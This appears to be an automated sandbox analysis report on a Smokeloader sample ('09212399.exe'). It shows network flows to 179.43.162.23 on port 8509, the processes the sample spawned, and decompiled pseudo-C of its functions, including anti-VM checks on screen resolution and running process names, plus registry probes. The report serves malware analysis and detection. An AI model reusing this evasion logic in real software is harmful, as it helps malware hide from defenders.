May 28, 2023 10:50:52.794114113 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.794154882 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.794178009 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.794219017 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:52.794872999 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.795098066 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.795409918 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.796144962 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.796627998 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.797246933 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.797677040 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.813719988 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:52.880127907 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.024200916 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:53.868328094 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:53.929811001 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.930093050 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:53.951862097 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.997946024 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.997971058 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.998020887 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.998034954 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:53.998070955 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:53.998125076 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:53.998370886 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:53.998465061 CEST	49701	8509	192.168.2.3	179.43.162.23
May 28, 2023 10:50:54.017847061 CEST	8509	49701	179.43.162.23	192.168.2.3
May 28, 2023 10:50:54.017915010 CEST	8509	49701	179.43.162.23	192.168.2.3

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 09212399.exePID: 4968, Parent PID: 3452

General

Target ID:	0
Start time:	10:49:57
Start date:	28/05/2023
Path:	C:\Users\user\Desktop\09212399.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\09212399.exe
Imagebase:	0x400000
File size:	503808 bytes
MD5 hash:	57DD320EAE0FADD155619407C8B5313C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.364029125.0000000002632000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.381636049.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: certreq.exePID: 7032, Parent PID: 3452

General

Target ID:	1
Start time:	10:50:01
Start date:	28/05/2023
Path:	C:\Windows\System32\certreq.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\certreq.exe
Imagebase:	0x7ff68c8c0000
File size:	517120 bytes
MD5 hash:	5A4F8BBCD943BC543B3F664C7DA83827
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7064, Parent PID: 7032

General

Target ID:	2
Start time:	10:50:01
Start date:	28/05/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 3332, Parent PID: 4968

General

Target ID:	5
Start time:	10:50:08
Start date:	28/05/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 880
Imagebase:	0xef0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 09212399.exePID: 4968, Parent PID: 3452COMMON

Executed Functions

Function 004018FB Relevance: 36.3, APIs: 24, Instructions: 320
memoryregistryfileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004018FB() {
				long _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t155;
				signed char* _t159;
				void* _t161;
				void* _t164;
				long _t165;
				int _t166;
				int _t169;
				void _t170;
				signed char* _t172;
				signed int _t173;
				long _t177;
				signed int _t187;
				void* _t189;
				char* _t193;
				void* _t194;
				struct HDC__* _t195;
				signed int _t196;
				signed int _t197;
				long _t199;
				long* _t201;
				signed int _t203;
				int _t208;
				signed int _t210;
				signed char* _t218;
				signed int _t221;
				long _t222;
				char* _t223;
				void* _t226;
				int _t228;
				void* _t231;
				void* _t233;
				void* _t235;

				_t233 = _t235 - 0x74;
				_t133 =  *(_t233 + 0x7c);
				_t231 =  *_t133;
				if(_t231 == 0) {
					L66:
					return _t133;
				}
				 *((intOrPtr*)(_t233 + 0x68)) = E004018FB;
				if( *((intOrPtr*)(_t231 + 0x34)) != 0) {
					_t196 =  *(_t231 + 0x38);
					_t221 = _t196 & 0x00000003;
					_t134 = 0;
					do {
						_t14 = _t134 + 0x41; // 0x41
						 *((short*)(_t233 + _t134 * 2 - 0x28)) = _t14;
						_t18 = _t134 + 0x61; // 0x61
						 *((short*)(_t233 + 0xc + _t134 * 2)) = _t18;
						_t134 = _t134 + 1;
					} while (_t134 < 0x1a);
					_t135 = 0;
					do {
						_t22 = _t135 + 0x30; // 0x30
						 *((short*)(_t233 + 0x40 + _t135 * 2)) = _t22;
						_t135 = _t135 + 1;
					} while (_t135 < 0xa);
					if(_t196 != 0x80) {
						_t136 = E0041476B();
						asm("cdq");
						_t197 = 8;
						 *(_t233 + 0x7c) = 0;
						_t187 = _t136 % _t197 + 4;
						if(_t187 == 0) {
							L46:
							 *(_t233 + _t187 * 2 - 0x128) =  *(_t233 + _t187 * 2 - 0x128) & 0x00000000;
							if(_t221 != 0) {
								_t222 = _t221 << 0xa;
								 *(_t233 + 0x70) = _t222;
								_t223 = HeapAlloc( *(_t231 + 0x18), 8, _t222);
								if((_t187 + _t221 & 0x00000001) == 0) {
									if(_t223 == 0) {
										L64:
										 *(_t231 + 0x38) =  *(_t231 + 0x38) + 1;
										goto L65;
									}
									 *(_t233 + 0x7c) =  *(_t233 + 0x70);
									_t189 = CreateFileW(_t233 - 0x128, 0x80000000, 7, 0, 3, 0, 0);
									if(_t189 != 0xffffffff) {
										 *(_t233 + 0x60) = ReadFile(_t189, _t223,  *(_t233 + 0x7c), _t233 + 0x7c, 0);
										CloseHandle(_t189);
										if( *(_t233 + 0x60) != 0) {
											 *((intOrPtr*)(_t231 + 0x3c)) =  *((intOrPtr*)(_t231 + 0x3c)) + 1;
										}
									}
									_push(_t223);
									L62:
									_push(0);
									L63:
									HeapFree( *(_t231 + 0x18), ??, ??);
									goto L64;
								}
								if(_t223 == 0) {
									goto L64;
								}
								 *((intOrPtr*)(_t231 + 0x24)) =  *((intOrPtr*)(_t231 + 0x24)) + 1;
								 *(_t233 + 0x6c) = 0;
								if(RegOpenKeyExW(0x80000001, _t233 - 0x128, 0, 0x20019, _t233 + 0x7c) == 0) {
									 *((intOrPtr*)(_t231 + 0x28)) =  *((intOrPtr*)(_t231 + 0x28)) + 1;
									if(RegQueryValueExW( *(_t233 + 0x7c), _t233 - 0x128, 0, _t233 + 0x54, _t223, _t233 + 0x70) == 0) {
										 *(_t233 + 0x6c) = 1;
									}
									RegCloseKey( *(_t233 + 0x7c));
									if( *(_t233 + 0x6c) != 0) {
										 *((intOrPtr*)(_t231 + 0x3c)) =  *((intOrPtr*)(_t231 + 0x3c)) + 1;
									}
								}
								_push(_t223);
								_push(0);
								goto L63;
							}
							 *((intOrPtr*)(_t231 + 0x34)) =  *((intOrPtr*)(_t231 + 0x34)) + 1;
							if( *((intOrPtr*)(_t231 + 0x34)) == 0x330) {
								 *((intOrPtr*)(_t233 + 0x68)) = E0040159B;
							}
							goto L64;
						} else {
							goto L45;
						}
						do {
							L45:
							_t155 = E0041476B();
							asm("cdq");
							_t203 = 0x3e;
							 *(_t233 + 0x7c) =  *(_t233 + 0x7c) + 1;
							 *((short*)(_t233 +  *(_t233 + 0x7c) * 2 - 0x128)) =  *((intOrPtr*)(_t233 + _t155 % _t203 * 2 - 0x28));
						} while ( *(_t233 + 0x7c) < _t187);
						goto L46;
					}
					_t159 = E0040154F(_t231, _t233 + 0x64, 0x895bade5);
					 *(_t233 + 0x58) = _t159;
					if(_t159 == 0 ||  *((intOrPtr*)(_t233 + 0x64)) == 0) {
						goto L64;
					} else {
						_push(0xe4e1cad6);
						_t161 = E0040358D(_t231 + 0xa0, _t231 + 0xa0, 0);
						if(_t161 == 0 ||  *((intOrPtr*)(_t231 + 0x1c)) + _t161 == 0) {
							goto L64;
						} else {
							 *(_t233 + 0x7c) = 0;
							NtQuerySystemInformation(5, 0, 0, _t233 + 0x7c); // executed
							_t164 = RtlAllocateHeap( *(_t231 + 0x18), 8,  *(_t233 + 0x7c)); // executed
							 *(_t233 + 0x6c) = _t164;
							if(_t164 == 0) {
								goto L64;
							}
							_t165 = NtQuerySystemInformation(5, _t164,  *(_t233 + 0x7c), _t233 + 0x54); // executed
							if(_t165 != 0) {
								L43:
								_push( *(_t233 + 0x6c));
								goto L62;
							}
							_t166 = HeapAlloc( *(_t231 + 0x18), 8, 0x1000);
							 *(_t233 + 0x70) = _t166;
							if(_t166 == 0) {
								goto L43;
							}
							_t226 =  *(_t233 + 0x6c);
							while(1) {
								_t193 =  *(_t233 + 0x70);
								_t169 = WideCharToMultiByte(0xfde9, 0,  *(_t226 + 0x3c), ( *(_t226 + 0x38) & 0x0000ffff) >> 1, _t193, 0x1000, 0, 0);
								if(_t169 <= 0 || _t169 >= 0xfff) {
									goto L40;
								}
								_t193[_t169] = 0;
								_t194 = 0;
								if( *((intOrPtr*)(_t233 + 0x64)) <= 0) {
									goto L40;
								}
								_t172 =  *(_t233 + 0x58);
								 *(_t233 + 0x5c) = _t172;
								do {
									_t208 =  *(_t233 + 0x70);
									_t218 = _t172;
									while(1) {
										_t173 =  *_t208 & 0x000000ff;
										 *(_t233 + 0x60) = _t208 + 1;
										if(_t173 >= 0x41 && _t173 <= 0x5a) {
											_t173 = _t173 + 0x20;
										}
										_t210 =  *_t218 & 0x000000ff;
										_t218 =  &(_t218[1]);
										if(_t210 >= 0x41 && _t210 <= 0x5a) {
											_t210 = _t210 + 0x20;
										}
										if(_t173 == 0 || _t173 != _t210) {
											break;
										}
										_t208 =  *(_t233 + 0x60);
									}
									if(_t173 == _t210) {
										 *((intOrPtr*)(_t233 + 0x68)) = E00401584;
										OutputDebugStringW( *(_t226 + 0x3c));
										 *(_t231 + 0x30) = 1;
										goto L40;
									}
									_t194 = _t194 + E004146E0( *(_t233 + 0x5c)) + 1;
									_t172 =  &(( *(_t233 + 0x58))[_t194]);
									 *(_t233 + 0x5c) = _t172;
									if( *_t172 == 0) {
										goto L40;
									}
								} while (_t194 <  *((intOrPtr*)(_t233 + 0x64)));
								L40:
								_t170 =  *_t226;
								if(_t170 == 0) {
									HeapFree( *(_t231 + 0x18), 0,  *(_t233 + 0x70));
									goto L43;
								}
								_t226 = _t226 + _t170;
							}
						}
					}
				} else {
					_t177 = GetSystemMetrics(0); // executed
					 *(_t233 + 0x7c) = _t177;
					_t228 = GetSystemMetrics(1);
					_t195 = GetDC(0);
					if(_t195 != 0) {
						 *(_t233 + 0x7c) = GetDeviceCaps(_t195, 0x76);
						_t228 = GetDeviceCaps(_t195, 0x75);
						ReleaseDC(0, _t195);
					}
					if( *(_t233 + 0x7c) <= 0x320 || _t228 <= 0x258) {
						 *(_t231 + 0x30) = 1;
					}
					 *((intOrPtr*)(_t231 + 0x34)) =  *((intOrPtr*)(_t231 + 0x34)) + 1;
					 *(_t231 + 0x38) =  *(_t231 + 0x38) & 0x00000000;
					L65:
					 *((intOrPtr*)(_t231 + 8)) =  *((intOrPtr*)(_t233 + 0x68));
					 *((intOrPtr*)(_t231 + 0xc)) = 0xf;
					_t199 =  *( *((intOrPtr*)(_t231 + 4)) + 4);
					_t133 = _t231 + 0x10;
					 *_t133 = _t199;
					 *(_t199 + 4) = _t133;
					_t201 =  *((intOrPtr*)(_t231 + 4)) + 4;
					 *(_t231 + 0x14) = _t201;
					 *_t201 = _t133;
					goto L66;
				}
			}

0x004018fc
0x00401906
0x0040190b
0x00401911
0x00401cb6
0x00401cbc
0x00401cbc
0x0040191b
0x00401922
0x00401985
0x0040198a
0x0040198d
0x0040198f
0x0040198f
0x00401992
0x00401997
0x0040199a
0x0040199f
0x004019a0
0x004019a5
0x004019a7
0x004019a7
0x004019aa
0x004019af
0x004019b0
0x004019bb
0x00401b43
0x00401b4a
0x00401b4b
0x00401b4e
0x00401b57
0x00401b5a
0x00401b7f
0x00401b7f
0x00401b8a
0x00401baa
0x00401bb3
0x00401bbf
0x00401bc1
0x00401c34
0x00401c8c
0x00401c8c
0x00000000
0x00401c8c
0x00401c4c
0x00401c55
0x00401c5a
0x00401c6e
0x00401c71
0x00401c7b
0x00401c7d
0x00401c7d
0x00401c7b
0x00401c80
0x00401c81
0x00401c81
0x00401c83
0x00401c86
0x00000000
0x00401c86
0x00401bc7
0x00000000
0x00000000
0x00401bcd
0x00401be6
0x00401bf1
0x00401bf3
0x00401c12
0x00401c14
0x00401c14
0x00401c1e
0x00401c27
0x00401c29
0x00401c29
0x00401c27
0x00401c2c
0x00401c2d
0x00000000
0x00401c2d
0x00401b8c
0x00401b96
0x00401b9c
0x00401b9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b5c
0x00401b5c
0x00401b5c
0x00401b61
0x00401b64
0x00401b6a
0x00401b75
0x00401b75
0x00000000
0x00401b5c
0x004019cb
0x004019d3
0x004019d6
0x00000000
0x004019e5
0x004019e5
0x004019f2
0x004019fc
0x00000000
0x00401a0d
0x00401a17
0x00401a1a
0x00401a2a
0x00401a2e
0x00401a31
0x00000000
0x00000000
0x00401a41
0x00401a45
0x00401b3b
0x00401b3b
0x00000000
0x00401b3b
0x00401a55
0x00401a59
0x00401a5c
0x00000000
0x00000000
0x00401a62
0x00401a65
0x00401a69
0x00401a83
0x00401a8b
0x00000000
0x00000000
0x00401a9c
0x00401aa0
0x00401aa5
0x00000000
0x00000000
0x00401aa7
0x00401aaa
0x00401aad
0x00401aad
0x00401ab0
0x00401ab7
0x00401ab7
0x00401abe
0x00401ac1
0x00401ac8
0x00401ac8
0x00401acb
0x00401ace
0x00401ad2
0x00401ad9
0x00401ad9
0x00401ade
0x00000000
0x00000000
0x00401ab4
0x00401ab4
0x00401ae6
0x00401b0c
0x00401b13
0x00401b19
0x00000000
0x00401b19
0x00401af0
0x00401af7
0x00401afd
0x00401b00
0x00000000
0x00000000
0x00401b02
0x00401b20
0x00401b20
0x00401b24
0x00401b35
0x00000000
0x00401b35
0x00401b26
0x00401b26
0x00401a65
0x004019fc
0x00401924
0x0040192b
0x0040192f
0x00401935
0x0040193d
0x00401941
0x00401951
0x00401959
0x0040195b
0x0040195b
0x00401968
0x00401972
0x00401972
0x00401979
0x0040197c
0x00401c8f
0x00401c95
0x00401c98
0x00401c9f
0x00401ca2
0x00401ca5
0x00401ca7
0x00401cad
0x00401cb0
0x00401cb3
0x00000000
0x00401cb5

APIs

KiUserCallbackDispatcher.NTDLL ref: 0040192B
GetSystemMetrics.USER32 ref: 00401932
GetDC.USER32(00000000), ref: 00401937
GetDeviceCaps.GDI32(00000000,00000076), ref: 0040194C
GetDeviceCaps.GDI32(00000000,00000075), ref: 00401954
ReleaseDC.USER32 ref: 0040195B
NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,?), ref: 00401A1A
RtlAllocateHeap.NTDLL(?,00000008,?), ref: 00401A2A
NtQuerySystemInformation.NTDLL(00000005,00000000,?,?), ref: 00401A41
HeapAlloc.KERNEL32(?,00000008,00001000), ref: 00401A55
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00001000,00000000,00000000), ref: 00401A83
_strlen.LIBCMT ref: 00401AEB
OutputDebugStringW.KERNEL32(?), ref: 00401B13
HeapFree.KERNEL32(?,00000000,?), ref: 00401B35
_rand.LIBCMT ref: 00401B43
_rand.LIBCMT ref: 00401B5C
HeapAlloc.KERNEL32(?,00000008,?), ref: 00401BB6
RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 00401BE9
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,?), ref: 00401C0A
RegCloseKey.ADVAPI32(00000000), ref: 00401C1E
CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00401C4F
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00401C67
CloseHandle.KERNEL32(00000000), ref: 00401C71
HeapFree.KERNEL32(?,00000000,00000000), ref: 00401C86

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$QuerySystem$AllocCapsCloseDeviceFileFreeInformation_rand$AllocateByteCallbackCharCreateDebugDispatcherHandleMetricsMultiOpenOutputReadReleaseStringUserValueWide_strlen
String ID:
API String ID: 1485895780-0
Opcode ID: 09f24d01021c4f45b3573f526868c692c3c4e34a23c2fc521a8450b8d850c5e1
Instruction ID: f5e19e1bd1697f65b54cb850e828dd1ba13a59a285341cbfbcca1d1933717591
Opcode Fuzzy Hash: 09f24d01021c4f45b3573f526868c692c3c4e34a23c2fc521a8450b8d850c5e1
Instruction Fuzzy Hash: B2C18C716007489FEB209F61CC84BAA37F9FB48344F24443AFD66A62A1D779E845CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040250D Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
memorynativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040250D(long _a4, void* _a8) {
				void* _v8;
				WCHAR* _v12;
				long _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				struct _MEMORY_BASIC_INFORMATION _v84;
				void* _t72;
				void* _t75;
				void* _t80;
				void* _t81;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr _t96;
				intOrPtr* _t103;
				intOrPtr* _t106;
				long _t108;
				void* _t116;
				void _t117;
				intOrPtr _t123;
				long _t128;
				intOrPtr* _t129;
				void** _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t140;
				void* _t141;

				_v12 = 0;
				_v16 = 0x401000;
				_t72 = HeapCreate(0, 0x100000, 0x1000000); // executed
				_v8 = _t72;
				if(VirtualQuery(E00402076,  &_v84, 0x1c) != 0) {
					GetModuleHandleW(0);
				}
				_t75 = _a8;
				_v28 = _t75;
				OutputDebugStringA("[ERROR] The Roland SoundCanvas Sound Set is licensed under Microsoft\'s End User License Agreement\n"); // executed
				if(_a4 != 0) {
					_t75 = E00414A90(_a4, "--fast");
					if(_t75 != 0) {
						_v12 = 1;
					}
				}
				if(_v8 == 0) {
					return _t75;
				} else {
					_t135 = 0x46cc20;
					 *0x46cc24 = 0x46cc20;
					 *0x46cc20 = 0x46cc20;
					_v20 = 0;
					_v24 = 0x401003;
					_t139 = HeapAlloc(_v8, 8, 0xe4);
					if(_t139 == 0) {
						L19:
						HeapDestroy(_v8); // executed
						_v16( &_v56);
						while(1) {
							_t80 =  *0x46cc20; // 0x829ee8
							if(_t80 == _t135) {
								break;
							}
							_t117 =  *_t80;
							_t140 = _t80;
							_t81 =  *(_t80 + 4);
							 *_t81 = _t117;
							 *(_t117 + 4) = _t81;
							if(_v40 != 0) {
								_a4 =  *((intOrPtr*)(_t140 + 0xc));
								_a8 =  *(_t140 + 0x10);
								E00414310( *(_t140 + 0x10), 0xcc,  *((intOrPtr*)(_t140 + 0xc)));
								_t141 = _t141 + 0xc;
								NtProtectVirtualMemory(0xffffffff,  &_a8,  &_a4, 4,  &_v16); // executed
							}
							if( *((intOrPtr*)(_t140 + 8)) != 0) {
								VirtualFree( *(_t140 + 0x10), 0, 0x8000); // executed
							}
							HeapFree(GetProcessHeap(), 0, _t140);
						}
						return _t80;
					}
					_t14 = _t139 + 0xd4; // 0xd4
					_t92 = _t14;
					 *_t92 = _t92;
					 *((intOrPtr*)(_t139 + 0xd8)) = _t92;
					_t17 = _t139 + 0xdc; // 0xdc
					_t93 = _t17;
					 *_t93 = _t93;
					 *((intOrPtr*)(_t139 + 0xe0)) = _t93;
					_t116 = HeapAlloc(_v8, 8, 0xc);
					if(_t116 == 0) {
						L15:
						if( *((intOrPtr*)(_t139 + 0x5c)) != 0) {
							_t96 =  *((intOrPtr*)(_t139 + 0x50));
							if(_t96 != 0) {
								_v44 =  &_v36;
								_v56 =  *((intOrPtr*)(_t139 + 0x5c));
								_v52 =  *((intOrPtr*)(_t139 + 0x60));
								_v48 = 0x20;
								_v40 = _t96;
								_v16 = E0040203B;
							}
						}
						RtlFreeHeap(_v8, 0, _t139); // executed
						goto L19;
					}
					E00402304(_t116);
					 *((intOrPtr*)(_t139 + 0x2c)) = _v12;
					 *((intOrPtr*)(_t139 + 0x18)) = _v8;
					 *((intOrPtr*)(_t139 + 0x58)) =  &_v36;
					 *((intOrPtr*)(_t139 + 0x40)) = 1;
					 *_t139 = _t139;
					 *(_t139 + 4) = _t116;
					 *((intOrPtr*)(_t139 + 8)) = E00402397;
					_t29 = _t116 + 4; // 0x4
					_t137 = _t29;
					 *((char*)(_t139 + 0x64)) =  *_a8;
					_t103 = _t139 + 0x10;
					_t123 =  *_t137;
					 *_t103 = _t123;
					 *((intOrPtr*)(_t123 + 4)) = _t103;
					 *((intOrPtr*)(_t139 + 0x14)) = _t137;
					 *_t137 = _t103;
					if(_t137 == _t103) {
						L14:
						E0040231F(_t116);
						HeapFree(_v8, 0, _t116);
						_t135 = 0x46cc20;
						goto L15;
					} else {
						goto L9;
					}
					do {
						L9:
						_t106 =  *((intOrPtr*)(_t116 + 8));
						_a4 = _t106 - 0x10;
						 *((intOrPtr*)( *((intOrPtr*)(_t106 + 4)))) =  *_t106;
						 *((intOrPtr*)( *_t106 + 4)) =  *((intOrPtr*)(_t106 + 4));
						_t108 = _a4;
						_t41 = _t108 + 0xc; // 0x840fdb85
						_t128 =  *_t41;
						if(_t128 > 0) {
							WaitForSingleObject( *_t116, _t128);
							_t108 = _a4;
						}
						_t43 = _t108 + 8; // 0x188b5308
						_t129 =  *_t43;
						if(_t129 != 0) {
							 *_t129(_t108); // executed
						}
					} while (_t137 !=  *_t137);
					goto L14;
				}
			}

0x00402521
0x00402524
0x0040252b
0x00402531
0x00402547
0x0040254a
0x0040254a
0x00402550
0x00402558
0x0040255b
0x00402564
0x0040256e
0x00402577
0x00402579
0x00402579
0x00402577
0x00402583
0x0040274f
0x00402589
0x0040259b
0x004025a0
0x004025a6
0x004025ac
0x004025b0
0x004025b9
0x004025bd
0x004026cd
0x004026d0
0x004026da
0x00402742
0x00402742
0x00402749
0x00000000
0x00000000
0x004026df
0x004026e1
0x004026e3
0x004026e6
0x004026e8
0x004026f0
0x004026ff
0x00402702
0x00402705
0x0040270a
0x0040271d
0x0040271d
0x00402724
0x00402730
0x00402730
0x0040273c
0x0040273c
0x00000000
0x0040274c
0x004025c5
0x004025c5
0x004025d0
0x004025d2
0x004025d8
0x004025d8
0x004025de
0x004025e0
0x004025e8
0x004025ec
0x00402691
0x00402695
0x00402697
0x0040269c
0x004026a1
0x004026a7
0x004026ad
0x004026b0
0x004026b7
0x004026ba
0x004026ba
0x0040269c
0x004026c7
0x00000000
0x004026c7
0x004025f3
0x004025fb
0x00402601
0x00402607
0x0040260d
0x00402614
0x00402616
0x00402619
0x00402622
0x00402622
0x00402625
0x00402628
0x0040262e
0x00402630
0x00402632
0x00402635
0x00402638
0x0040263a
0x00402679
0x0040267a
0x00402686
0x0040268c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040263c
0x0040263c
0x0040263c
0x00402644
0x0040264a
0x00402651
0x00402654
0x00402657
0x00402657
0x0040265c
0x00402661
0x00402667
0x00402667
0x0040266a
0x0040266a
0x0040266f
0x00402672
0x00402674
0x00402675
0x00000000
0x0040263c

APIs

HeapCreate.KERNELBASE(00000000,00100000,01000000,00000000), ref: 0040252B
VirtualQuery.KERNEL32(00402076,?,0000001C), ref: 0040253F
GetModuleHandleW.KERNEL32(00000000), ref: 0040254A
OutputDebugStringA.KERNELBASE([ERROR] The Roland SoundCanvas Sound Set is licensed under Microsoft's End User License Agreement), ref: 0040255B
HeapAlloc.KERNEL32(?,00000008,000000E4,74CB4DE0), ref: 004025B7
HeapAlloc.KERNEL32(?,00000008,0000000C), ref: 004025E6
WaitForSingleObject.KERNEL32(00000000,840FDB85), ref: 00402661
HeapFree.KERNEL32(?,00000000,00000000), ref: 00402686
RtlFreeHeap.NTDLL(?,00000000,00000000,?,?,?,?,?,0041B378), ref: 004026C7
HeapDestroy.KERNELBASE(?), ref: 004026D0
NtProtectVirtualMemory.NTDLL(000000FF,00401000,?,00000004,00401000), ref: 0040271D
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00402730
GetProcessHeap.KERNEL32(00000000,00829EE8), ref: 00402735
HeapFree.KERNEL32(00000000), ref: 0040273C

Strings

[ERROR] The Roland SoundCanvas Sound Set is licensed under Microsoft's End User License Agreement, xrefs: 00402553
, xrefs: 004026B0
--fast, xrefs: 00402566

Memory Dump Source

Source File: 00000000.00000002.381412112.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$Free$Virtual$Alloc$CreateDebugDestroyHandleMemoryModuleObjectOutputProcessProtectQuerySingleStringWait
String ID: $--fast$[ERROR] The Roland SoundCanvas Sound Set is licensed under Microsoft's End User License Agreement
API String ID: 2484894101-524370068
Opcode ID: b333590bc7c968e5a65e302be90e3c3f008d49cc22ddbd7a912315806a3ce629
Instruction ID: 10e46f84583de86a18a8a6ec6af8033e847e5e52da1124e9cd67c3e793889bfe
Opcode Fuzzy Hash: b333590bc7c968e5a65e302be90e3c3f008d49cc22ddbd7a912315806a3ce629
Instruction Fuzzy Hash: 64711A70A01305EFDB10CF65D988B9EBBF4FF08704F14846AE959A73A1D7B4A944CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 16.8, APIs: 11, Instructions: 292
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040159B(void* _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v300;
				char _v304;
				intOrPtr* _t118;
				intOrPtr* _t119;
				signed int _t121;
				void* _t123;
				signed int _t127;
				long _t137;
				void* _t141;
				void* _t149;
				long _t153;
				intOrPtr* _t155;
				long _t158;
				intOrPtr* _t160;
				void* _t163;
				void* _t165;
				void* _t168;
				intOrPtr _t179;
				signed int _t182;
				intOrPtr _t184;
				intOrPtr* _t186;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t199;
				intOrPtr _t200;
				intOrPtr _t211;
				intOrPtr* _t214;
				intOrPtr* _t215;
				intOrPtr* _t216;
				long _t217;
				intOrPtr _t223;
				void* _t224;

				_t118 = _a4;
				_v8 = _v8 & 0x00000000;
				_t223 =  *_t118;
				if(_t223 == 0) {
					return _t118;
				} else {
					_t182 =  *(_t223 + 0x24);
					_t211 =  *((intOrPtr*)(_t223 + 0x30));
					if(_t182 > 0 &&  *(_t223 + 0x28) * 0x64 / _t182 > 1) {
						_t211 = 1;
					}
					if(_t211 != 0) {
						L14:
						if( *((intOrPtr*)(_t223 + 0x48)) == 0 || _v8 == 0 ||  *((intOrPtr*)(_t223 + 0x1c)) == 0) {
							L47:
							 *((intOrPtr*)(_t223 + 8)) = E00401584;
							 *((intOrPtr*)(_t223 + 0xc)) = 0x12c;
							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 4)) + 4));
							_t119 = _t223 + 0x10;
							 *_t119 = _t184;
							 *((intOrPtr*)(_t184 + 4)) = _t119;
							_t186 =  *((intOrPtr*)(_t223 + 4)) + 4;
							 *((intOrPtr*)(_t223 + 0x14)) = _t186;
							 *_t186 = _t119;
							return _t119;
						} else {
							_t121 = E0040154F(_t223,  &_a4, 0xbf0e967b);
							_v12 = _t121;
							if(_t121 == 0) {
								L41:
								_push(0x4b6dd47d);
								_t123 = E0040358D(_t223 + 0xa0, _t223 + 0xa0, 0);
								if(_t123 != 0) {
